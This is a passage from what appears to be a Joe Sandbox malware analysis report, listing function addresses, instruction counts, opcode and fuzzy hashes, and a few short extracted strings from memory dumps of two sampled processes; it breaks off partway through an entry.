                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6d64ffdbd2bacc1e10b2f49341e04cd0db32569d1a527197dd199f6862d0e9d1
                                                  • Instruction ID: 7fefdfdf1dca897dea8fb6f369545344abb2d2d51564df511088c4cc22ec5aba
                                                  • Opcode Fuzzy Hash: 6d64ffdbd2bacc1e10b2f49341e04cd0db32569d1a527197dd199f6862d0e9d1
                                                  • Instruction Fuzzy Hash: D3F0C23184F2C99FE3169BB088255A53FA0AF03310F1900F6D04A8B0B2CA2D564ACB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB5137 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e04d264cc7c00e724b7c743b9e187fec9a2bea1d8f9c49043cbbb41cac0af8eb
                                                  • Instruction ID: 3a698a9eef35b35993a639cec7ba5efacfa96065dfcb55c53a1148de444c681b
                                                  • Opcode Fuzzy Hash: e04d264cc7c00e724b7c743b9e187fec9a2bea1d8f9c49043cbbb41cac0af8eb
                                                  • Instruction Fuzzy Hash: D9011D74A1885DCFDB68EF58C4B0AA8B7B1FF68314F1401ADD00EE72A1DA31A940CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD2729 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 130ab85bd2662303f71cd9d28a2f2e5b50d78ba5d200f9209cb29ed45456a1b4
                                                  • Instruction ID: fb5ae08ac5c012bb34808419f64cbdf7895b499e55e7d1dc4ca880f47a765ca3
                                                  • Opcode Fuzzy Hash: 130ab85bd2662303f71cd9d28a2f2e5b50d78ba5d200f9209cb29ed45456a1b4
                                                  • Instruction Fuzzy Hash: 7AF0C23090E38D8FDB699B6088241A93B60BF46200F4205BAD459C60E2DB78A514CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BADC390 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bada000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d27b3bcfeacfd8e63a1cb9aefa611bc74290184b5cc5b21f9795a5d1f95760d8
                                                  • Instruction ID: 3817d8363c1ac6114d5a28b55be3bb740d5298242b026cbe67ea2062254b7c30
                                                  • Opcode Fuzzy Hash: d27b3bcfeacfd8e63a1cb9aefa611bc74290184b5cc5b21f9795a5d1f95760d8
                                                  • Instruction Fuzzy Hash: ADF05430D1964E8BEB54EF64C8196FEB2A0FF58305F40053AE81DC2191EB7452508641
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD279D Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73bd425d05ea51ca80b2b1eac35b28ccd6967b10f6733106a6f6b15825fa35d8
                                                  • Instruction ID: c04507be98dd14e6ea0fc35914577db1461c73ce1ec93b54151843664f1793c2
                                                  • Opcode Fuzzy Hash: 73bd425d05ea51ca80b2b1eac35b28ccd6967b10f6733106a6f6b15825fa35d8
                                                  • Instruction Fuzzy Hash: B8F0F030A1E78E8FEB689FA488252A93BA0FF45310F0201BED409C21E2DB799650CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE81EC Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c3ccdb3e852e6c08e171358950cdfbada669ddadb2ec306850a8d7b2062abfc0
                                                  • Instruction ID: 0cc8f5566c97c3b9049da6666289ec4726c9d37558b94fd702537db954acdf4f
                                                  • Opcode Fuzzy Hash: c3ccdb3e852e6c08e171358950cdfbada669ddadb2ec306850a8d7b2062abfc0
                                                  • Instruction Fuzzy Hash: 4BF0B770F15A2D4EEBA0EB68C8557A9B6B1FB55300F5141F9904CD32A2DE302A858F01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBF1BB Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08f11b52904df86c80d766f7cdb05e6ffe568586b6c2f7f89b1097b711b60ab6
                                                  • Instruction ID: 929442a88fe637e37f86bb0434202de706969926d54c2f7b80e094d3837f77f1
                                                  • Opcode Fuzzy Hash: 08f11b52904df86c80d766f7cdb05e6ffe568586b6c2f7f89b1097b711b60ab6
                                                  • Instruction Fuzzy Hash: 98F08232F0BB6A8BE7799B6094641B573A1EF40361F51193BC41F836A1CF29A6418A10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB118C Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f70d5ee56d381cf53ce2c75613e4a29ff461e6410c01e7b573f689df8d7b148e
                                                  • Instruction ID: d40389a0645be5f670f1ff43b53aa555ba47ac617965d7a925a22437ba0e77dc
                                                  • Opcode Fuzzy Hash: f70d5ee56d381cf53ce2c75613e4a29ff461e6410c01e7b573f689df8d7b148e
                                                  • Instruction Fuzzy Hash: FAF0EC3161DA5A4FE715929CD8617D47791EF41370F0A03BAC455C71E2C95D52858741
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB54BF Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                  • Instruction ID: 4db948dae2ba4866cde61abedae6c9d6d4cbe2417c065b3d899068c8eeade147
                                                  • Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                  • Instruction Fuzzy Hash: B6F0D47490AA5CDFCF55EBA8C85AE99BBB0FF68310F1001EDD00ADB262CA319945CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD0FA1 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ec95d96ead887c82e801f0a7147b695ce3e121a927688c88f6b1a431cf2fd61
                                                  • Instruction ID: 0d311023dc43d359749217e04f81a5a046fa21ef1fd65f876381ebec44c1e0b2
                                                  • Opcode Fuzzy Hash: 6ec95d96ead887c82e801f0a7147b695ce3e121a927688c88f6b1a431cf2fd61
                                                  • Instruction Fuzzy Hash: 41F01230E0540D8BEB64DB58CC64FEDB3B1EF58705F108365D419E7295DE7469848F44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE7A2F Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 64989b4e64bf7d1186954bc9d57bd729ae787677a4d58a70bc6059adc66b9972
                                                  • Instruction ID: 05af5e6fcf9cd433fb843dd86909965ea2f80cca5a21618a8ef2c5904b03327f
                                                  • Opcode Fuzzy Hash: 64989b4e64bf7d1186954bc9d57bd729ae787677a4d58a70bc6059adc66b9972
                                                  • Instruction Fuzzy Hash: F2E04F35B0490D8BDB00EB89E8419EDB7B4EF84324F440276D018E7294CA7469868B80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB6287 Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61d6dad0ce9ad32f56cc77eedc741fad665e157fbcc4f061a0b900da0819455b
                                                  • Instruction ID: 66e0f9e9d2f42d95db6ca302866241b3f7b91e46b1deee209dd203837181258c
                                                  • Opcode Fuzzy Hash: 61d6dad0ce9ad32f56cc77eedc741fad665e157fbcc4f061a0b900da0819455b
                                                  • Instruction Fuzzy Hash: 07D0C202F0F39B0BEB2E06A404711282BC0CF0735070B05B9D1478F1E3D968B9084711
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD8EFB Relevance: .0, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad8000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a051c050022fdacda20b4c22505dc0dba95d933aee571741b38c6ae5758c084c
                                                  • Instruction ID: d1fdfa92dfe32601885c8e29bdcf3809225be19548e6bb3de7467e1eef4b31db
                                                  • Opcode Fuzzy Hash: a051c050022fdacda20b4c22505dc0dba95d933aee571741b38c6ae5758c084c
                                                  • Instruction Fuzzy Hash: 8AD02670A1592D8FDBA4DB48C8A47A9B6B5AB59301F5101E9804DE2261DE701A80CF01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF4E02 Relevance: .0, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9ba0792c01bd131ece3da996016f171614ca12a2d0722621092a1e08a3409401
                                                  • Instruction ID: 2170b7d0217bf1d3f4990a7e94d97cd9035f58e0c772ae2b7e38d5cfbdfa4d0d
                                                  • Opcode Fuzzy Hash: 9ba0792c01bd131ece3da996016f171614ca12a2d0722621092a1e08a3409401
                                                  • Instruction Fuzzy Hash: FEC01220B0E76E8FD3625B7804202B81982AF0920072108BA900BCA2EADC695A008290
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BADB20B Relevance: .0, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bada000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ffa08f87961ec311e259279bdd2c3c129b1f646e90f952dbde5a38c098d34ba7
                                                  • Instruction ID: e3e88d83944ad1416f1521aa81c8f69064073e3ae36f0ce2feb345b805c10fda
                                                  • Opcode Fuzzy Hash: ffa08f87961ec311e259279bdd2c3c129b1f646e90f952dbde5a38c098d34ba7
                                                  • Instruction Fuzzy Hash: 69D09220A1991E8AEB64EB94C850BA9B260BF98304F5047A6900DA6196CA34AA818F80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF26AB Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0ead953dacc86d82a2f3683d79653d48c05253004b1f51817a113c88646d41ed
                                                  • Instruction ID: 0ea88dda114eac2898e98ab6746c33e47644a1655f0cdbd947ed342e0c026c96
                                                  • Opcode Fuzzy Hash: 0ead953dacc86d82a2f3683d79653d48c05253004b1f51817a113c88646d41ed
                                                  • Instruction Fuzzy Hash: 01D0C910B4F70F85F1B867C141302BA69909F90701EE2003DF09F519F1CDBCB7016662
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAED63B Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7e4e2d27cc19b95ac49d679420b769d31a0b3f1c33d7fc346968aad416741ebb
                                                  • Instruction ID: bc25b1430f01d0757f204b15056b50fcda864ae6afb9aefc078d8b02514451f9
                                                  • Opcode Fuzzy Hash: 7e4e2d27cc19b95ac49d679420b769d31a0b3f1c33d7fc346968aad416741ebb
                                                  • Instruction Fuzzy Hash: 23D0C914B1F50F89F1396BC5407023D25905F51300E264C7DC0DF428E1CEAD7B41E602
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB6D6B Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7db2d3405564e309b2cda4c3e996eebb1f5e3147f00f7c63f7d4c7a3ee1eee9a
                                                  • Instruction ID: 204138958bdab6c1721d6580be5f5609ed3c47888d37695d93640e6fd053c359
                                                  • Opcode Fuzzy Hash: 7db2d3405564e309b2cda4c3e996eebb1f5e3147f00f7c63f7d4c7a3ee1eee9a
                                                  • Instruction Fuzzy Hash: 45D09215B0F56F85F63D4A81803023995A15F45320E26603DC09F439E18918F6416E02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB07C4 Relevance: .0, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3c47958dd555dbb8f4841e51b90b9a8be9cd2a881690aa516d4bf3a2fda9ab31
                                                  • Instruction ID: 9d13467c395b7205f34cdf5cb155b83795ccebdc7e6e744de0d46480cd1ba68f
                                                  • Opcode Fuzzy Hash: 3c47958dd555dbb8f4841e51b90b9a8be9cd2a881690aa516d4bf3a2fda9ab31
                                                  • Instruction Fuzzy Hash: 19B09242F1E11B62AA3800A388684B803564BC2BA267B1F34D44B975A2BCA82D0219E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB117D Relevance: .0, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f13eb28545b1ac0260ed238b271b9a3ce7d3c76b217bb33839c07d9db255dc8d
                                                  • Instruction ID: 9401dca8c9c40f6ab9a7c10dddbfde32f6dcdf41402dc5bb0a57801f57cbfc79
                                                  • Opcode Fuzzy Hash: f13eb28545b1ac0260ed238b271b9a3ce7d3c76b217bb33839c07d9db255dc8d
                                                  • Instruction Fuzzy Hash: 8FB09221B1E81B9AF2389290807023D11B65F843E0F269438D01F87AF5DE2CBA029B10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF1BF1 Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92dcda61bac1f83781bb789a792d7796391cdc250812c3143bf8241cbba82c6c
                                                  • Instruction ID: f138c9e0fe0a4537db2e02f2aa912890a52d848f76e9b10c1e57dfbf62219ab5
                                                  • Opcode Fuzzy Hash: 92dcda61bac1f83781bb789a792d7796391cdc250812c3143bf8241cbba82c6c
                                                  • Instruction Fuzzy Hash: 4AB01200F0E30F53F13003F444700BC04500B55281A570934D10B892E3DCCD3F011290
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEC743 Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f137cdd1f83d6b22f4e54eed0239b6d93071933c80d1178526bc755bdd8209ac
                                                  • Instruction ID: d0fd38b5213cfd70976969bf62556fcd34d8c25cc00d4dc7b59c31d295667bf2
                                                  • Opcode Fuzzy Hash: f137cdd1f83d6b22f4e54eed0239b6d93071933c80d1178526bc755bdd8209ac
                                                  • Instruction Fuzzy Hash: F6B00110F0E20B97F63422F418B517C11811B4A295AA74A35E65FAA2E3FDEC3A4163E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBF3EB Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: df6634be424a25a4f170010619e0f9cfc9457f8971344a2fbdf6a75b0ac11e8c
                                                  • Instruction ID: 8e9242d3d1d90caec8b42083d2e9bec260a2e857c968246bddc14980ebffed29
                                                  • Opcode Fuzzy Hash: df6634be424a25a4f170010619e0f9cfc9457f8971344a2fbdf6a75b0ac11e8c
                                                  • Instruction Fuzzy Hash: F7C08C3080F3818EC3265764C0210A83BA00F0332031619B2C441870A3C4296005DB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB26C6 Relevance: .0, Instructions: 5COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b4d55d637c4a3004bb26c08fb6f346fdfa8d4d137cd6ba459e4ce1dabb87f27e
                                                  • Instruction ID: c31e3cd10c02357bbcab2525812e5ae58e04fe4ff7e9bf533cbefcb29773f7f7
                                                  • Opcode Fuzzy Hash: b4d55d637c4a3004bb26c08fb6f346fdfa8d4d137cd6ba459e4ce1dabb87f27e
                                                  • Instruction Fuzzy Hash: 14A02220F0F20E02FA3C20F800300BC88C22F88300B220038800FC32FACC3CBA000000
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00007FFD9BAE8930 Relevance: 5.2, Strings: 4, Instructions: 155COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: J_^$J_^$J_^$J_^
                                                  • API String ID: 0-563750895
                                                  • Opcode ID: 54727e6824ad3b75a5469b23352d3b77cc9141ac34f1834ca087695dd5a18da0
                                                  • Instruction ID: 67c07f8a6eff81684571b8a41b25948eda34003eacc24f798d5a36d2d7949c19
                                                  • Opcode Fuzzy Hash: 54727e6824ad3b75a5469b23352d3b77cc9141ac34f1834ca087695dd5a18da0
                                                  • Instruction Fuzzy Hash: 0A412B63F0E5D64FE7265BADA8B51E82B50EF6133D70E02F7D4D84F0A7ED142406825A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE87FD Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: J_^$J_^$J_^$J_^
                                                  • API String ID: 0-2605331175
                                                  • Opcode ID: d367e545630d27bfd19363f23e83dee5ad362b98af6a33411648f5f4053cb613
                                                  • Instruction ID: dc44ac24edfb80d5ce8c379ea1d6e1f7475d31b17a97d75549294d2a711269bb
                                                  • Opcode Fuzzy Hash: d367e545630d27bfd19363f23e83dee5ad362b98af6a33411648f5f4053cb613
                                                  • Instruction Fuzzy Hash: F8212CE3E0A4960FE365566C6CB24E43791FF657ADB0E01F1ECE85B163F8142D478681
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  Function 00007FFD9BAB3B95 Relevance: 2.7, Strings: 2, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9bab1000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Ls)$fs)
                                                  • API String ID: 0-2047528907
                                                  • Opcode ID: 810874f05da740fd4d90f1e8a06d8811b8dced1146904fe48a13f8d517f0120f
                                                  • Instruction ID: 26412f73cff348b4c53d4e850d791e10780662bf282cd9f5c4427f47f42790a1
                                                  • Opcode Fuzzy Hash: 810874f05da740fd4d90f1e8a06d8811b8dced1146904fe48a13f8d517f0120f
                                                  • Instruction Fuzzy Hash: 1E81DB70E1962D8EEBA4EB98C8557ADB7F1FF58300F1141BAD01DE32A1DE746A848F00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAB18BC Relevance: 2.5, Strings: 2, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9bab1000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $/
                                                  • API String ID: 0-2637513485
                                                  • Opcode ID: b5146243d161f0afe60e30ee2e3d28928d15a56de2a6c7bed29b19d3391bf3e0
                                                  • Instruction ID: 4ff96d375b1099d088381e0dd53bb0d6e33c8573d8fe60c46dcc54560e1b53d9
                                                  • Opcode Fuzzy Hash: b5146243d161f0afe60e30ee2e3d28928d15a56de2a6c7bed29b19d3391bf3e0
                                                  • Instruction Fuzzy Hash: 9F118270E092AD8EDB35DF90C8147EC77B1AF11300F1145B9C05E6B192DBB81A48DF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAB1708 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9bab1000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "
                                                  • API String ID: 0-123907689
                                                  • Opcode ID: fcfea6a5e75daf1e8873f813545466003af70597f2617f527dae143c64571cb6
                                                  • Instruction ID: d0e4601e20aec22c66d180c6d5242723a81265612942889a77feef7d4ce3600b
